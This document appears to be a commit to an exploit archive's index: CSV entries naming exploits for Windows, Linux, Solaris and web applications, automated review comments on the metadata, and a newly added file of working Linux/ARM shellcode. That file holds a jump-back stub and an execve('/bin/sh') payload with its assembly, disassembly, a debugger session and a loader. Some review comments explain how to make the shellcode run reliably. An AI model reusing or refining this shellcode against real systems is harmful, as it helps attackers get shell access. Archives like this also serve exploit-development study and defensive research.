45432,exploits/windows/dos/45432.js,"Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion",2018-09-18,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
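Review bot: the only change to 45424 is the port column (blank to 21); the Netis DL4322D DoS PoC is not in this commit, so confirm 21 is the service the script hits rather than the router's web UI (the sibling XSS entry 45422 for the same device gets 80 further down in this commit). Also, 45431 and 45432 are filed as `dos` although both write-ups describe exploitable type confusions; that matches the convention for Google Security Research PoCs, but a word in the commit message would save the next reader the question.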
@ -9977,6 +9979,7 @@ id,file,description,date,author,type,platform,port
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
45433,exploits/solaris/local/45433.rb,"Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)",2018-09-18,Metasploit,local,solaris,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16807,6 +16810,8 @@ id,file,description,date,author,type,platform,port
45345,exploits/linux/remote/45345.txt,"Tenable WAS-Scanner 7.4.1708 - Remote Command Execution",2018-09-07,"Sameer Goyal",remote,linux,
45367,exploits/multiple/remote/45367.rb,"Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)",2018-09-10,Metasploit,remote,multiple,
45425,exploits/java/remote/45425.py,"CA Release Automation NiMi 6.5 - Remote Command Execution",2018-09-17,"Jakub Palaczynski",remote,java,
45427,exploits/hardware/remote/45427.py,"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)",2018-09-18,"Jacob Baines",remote,hardware,80
45429,exploits/windows/remote/45429.txt,"Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution",2018-09-18,"Che-Chun Kuo",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39806,7 +39811,7 @@ id,file,description,date,author,type,platform,port
44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware,
44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
44952,exploits/php/webapps/44952.html,"BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin)",2018-06-28,bay0net,webapps,php,80
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - SQL Injection",2018-06-28,Hzllaga,webapps,php,
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - (Authenticated) SQL Injection",2018-06-28,Hzllaga,webapps,php,
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
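Review bot: 44953 is retitled to '(Authenticated) SQL Injection' with id, file, date and author unchanged, which is the right shape for a retitle; the advisory file itself is not part of this commit, so the authentication requirement is taken on trust here and the commit message's pairing of old and new titles is the only record of why. One line there saying the advisory requires an authenticated user would make the change self-explaining.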
@ -39972,5 +39977,6 @@ id,file,description,date,author,type,platform,port
45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,
45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,80
45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php,
45434,exploits/php/webapps/45434.txt,"WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting",2018-09-18,"Larry W. Cashdollar",webapps,php,80
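Review bot: the 45422 correction adds port 80, but the port column is still inconsistent within this hunk: 45411 and 45434 carry 80 and 45409 carries 443, while 45423 (Joomla JCK Editor 'parent' SQL Injection, also an HTTP web application) stays blank. If 80 is the default for HTTP webapps entries, fill in 45423 in the same pass; otherwise a blank cannot be told apart from "unknown" by anything consuming the CSV.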

@ -912,3 +912,4 @@ id,file,description,date,author,type,platform
45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45418,shellcodes/linux_x86/45418.c,"Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
45426,shellcodes/arm/45426.c,"Linux/ARM - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (4 Bytes)",2018-09-18,"Ken Kitahara",shellcode,arm
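Review bot: the "(4 Bytes)" in the 45426 description counts only the jump-back stub; the execve("/bin/sh", NULL, NULL) payload it jumps into is 27 bytes, as the file itself states, so the title overstates what fits in four bytes. A description such as "Jump Back Shellcode (4 Bytes) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 Bytes)" would state both sizes the way 45416-45418 do. Drive-by in the unchanged 45417 context line: "Linux/86" should read "Linux/x86" like its neighbours.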


shellcodes/arm/45426.c Normal file

@ -0,0 +1,226 @@
/*
# Title: Linux/ARM - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (4 Bytes)
# Date: 2018-09-18
# Author: Ken Kitahara
# Tested: armv7l (Raspberry Pi 3 Model B+)
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Shellcode]
(1) Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat padding.s
.section .text
.global _start
_start:
eor r7, r7, r7
pi@raspberrypi:~ $ as -o padding.o padding.s && ld -N -o padding padding.o
pi@raspberrypi:~ $ objdump -d ./padding
./padding: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e0277007 eor r7, r7, r7
pi@raspberrypi:~ $
(2) execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// execve("/bin/sh", NULL, NULL)
adr r0, spawn
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #endline-spawn]
mov r7, #11
svc #1
spawn:
.ascii "/bin/sh"
endline:
pi@raspberrypi:~ $ as -o shell.o shell.s && ld -N -o shell shell.o
pi@raspberrypi:~ $ objdump -d ./shell
./shell: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e28f3001 add r3, pc, #1
10058: e12fff13 bx r3
1005c: a002 add r0, pc, #8 ; (adr r0, 10068 <spawn>)
1005e: 4049 eors r1, r1
10060: 4052 eors r2, r2
10062: 71c2 strb r2, [r0, #7]
10064: 270b movs r7, #11
10066: df01 svc 1
00010068 <spawn>:
10068: 6e69622f .word 0x6e69622f
1006c: 732f .short 0x732f
1006e: 68 .byte 0x68
0001006f <endline>:
...
pi@raspberrypi:~ $ ./shell
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $
(3) Jump Back Shellcode (4 Bytes)
pi@raspberrypi:~ $ cat jmpback.s
.section .text
.global _start
_start:
// Jump back 0x30 bytes from _start address.
sub pc, pc, #0x30+0x08
pi@raspberrypi:~ $ as -o jmpback.o jmpback.s && ld -N -o jmpback jmpback.o
pi@raspberrypi:~ $ objdump -d ./jmpback
./jmpback: file format elf32-littlearm
Disassembly of section .text:
00010054 <_start>:
10054: e24ff038 sub pc, pc, #56 ; 0x38
pi@raspberrypi:~ $
[Operation Test]
pi@raspberrypi:~ $ ./loader
Shellcode Length: 4
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $ gdb -q ./loader
GEF for linux ready, type `gef' to start, `gef config' to configure
69 commands loaded for GDB 7.12.0.20161007-git using Python engine 3.5
[*] 1 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./loader...(no debugging symbols found)...done.
gef disass main
Dump of assembler code for function main:
0x00010470 <+0>: push {r11, lr}
0x00010474 <+4>: add r11, sp, #4
0x00010478 <+8>: sub sp, sp, #8
0x0001047c <+12>: ldr r0, [pc, #44] ; 0x104b0 <main+64>
0x00010480 <+16>: bl 0x10330 <strlen@plt>
0x00010484 <+20>: mov r3, r0
0x00010488 <+24>: mov r1, r3
0x0001048c <+28>: ldr r0, [pc, #32] ; 0x104b4 <main+68>
0x00010490 <+32>: bl 0x1030c <printf@plt>
0x00010494 <+36>: ldr r3, [pc, #20] ; 0x104b0 <main+64>
0x00010498 <+40>: str r3, [r11, #-8]
0x0001049c <+44>: ldr r3, [r11, #-8]
0x000104a0 <+48>: blx r3
0x000104a4 <+52>: nop ; (mov r0, r0)
0x000104a8 <+56>: sub sp, r11, #4
0x000104ac <+60>: pop {r11, pc}
0x000104b0 <+64>: andeq r1, r2, r8, rrx
0x000104b4 <+68>: andeq r0, r1, r8, lsr #10
End of assembler dump.
gef b *main+48
Breakpoint 1 at 0x104a0
gef r
Starting program: /home/pi/loader
Shellcode Length: 4
--snip--
Breakpoint 1, 0x000104a0 in main ()
gef si
--snip--
[ code:arm ]
0x2105c <shell+48> svcle 0x0001270b
0x21060 <shell+52> cdpvs 2, 6, cr6, cr9, cr15, {1}
0x21064 <shell+56> rsbeq r7, r8, pc, lsr #6
0x21068 <sc+0> sub pc, pc, #56 ; 0x38
0x2106c <sc+4> andeq r0, r0, r0
--snip--
gef i r pc
pc 0x21068 0x21068 <sc>
gef si
--snip--
[ code:arm ]
0x2102c <shell+0> eor r7, r7, r7
0x21030 <shell+4> eor r7, r7, r7
0x21034 <shell+8> eor r7, r7, r7
0x21038 <shell+12> eor r7, r7, r7
0x2103c <shell+16> eor r7, r7, r7
0x21040 <shell+20> eor r7, r7, r7
--snip--
gef i r pc
pc 0x21038 0x21038 <shell+12>
gef c
Continuing.
process 968 is executing new program: /bin/dash
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
[Inferior 1 (process 968) exited normally]
gef q
pi@raspberrypi:~ $
*/
#include<stdio.h>
#include<string.h>
unsigned char shell[] = \
// Use "eor r7, r7, r7" Shellcode as Padding Shellcode (4 Bytes * 8)
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
"\x07\x70\x27\xe0\x07\x70\x27\xe0"
// execve("/bin/sh", NULL, NULL) Shellcode (27 Bytes)
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x02\xa0\x49\x40\x52\x40\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68";
// Jump Back Shellcode (4 Bytes)
unsigned char sc[] = \
"\x38\xf0\x4f\xe2";
void main()
{
printf("Shellcode Length: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}
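Review bot: the 0x30 jump distance encoded in `sc` silently depends on the compiler placing `sc` directly after `shell` in .data (in the gdb session `shell` is at 0x2102c and, at 60 bytes including the terminating NUL, ends exactly where `sc` starts at 0x21068, so pc - 0x38 lands at shell+12 inside the eor sled), and nothing in the file states or checks that layout. A different compiler, optimisation level or declaration order changes the distance, so the header should say the offset was measured for this build, as the transcript shows, and must be recomputed otherwise. Three smaller points for the header and the loader: the loader is run but never built, and calling into a global array only works with an executable data mapping (e.g. linking with -z execstack); the execve stub's `strb r2, [r0, #7]` writes the NUL terminator into its own bytes, so the shellcode also needs a writable page (which is why the stand-alone test links with `ld -N` and the loader keeps it in .data), worth a sentence for anyone reusing the 27-byte stub on its own; and `void main()` with `%d` for `strlen`'s size_t result should be `int main(void)` with `%zu`.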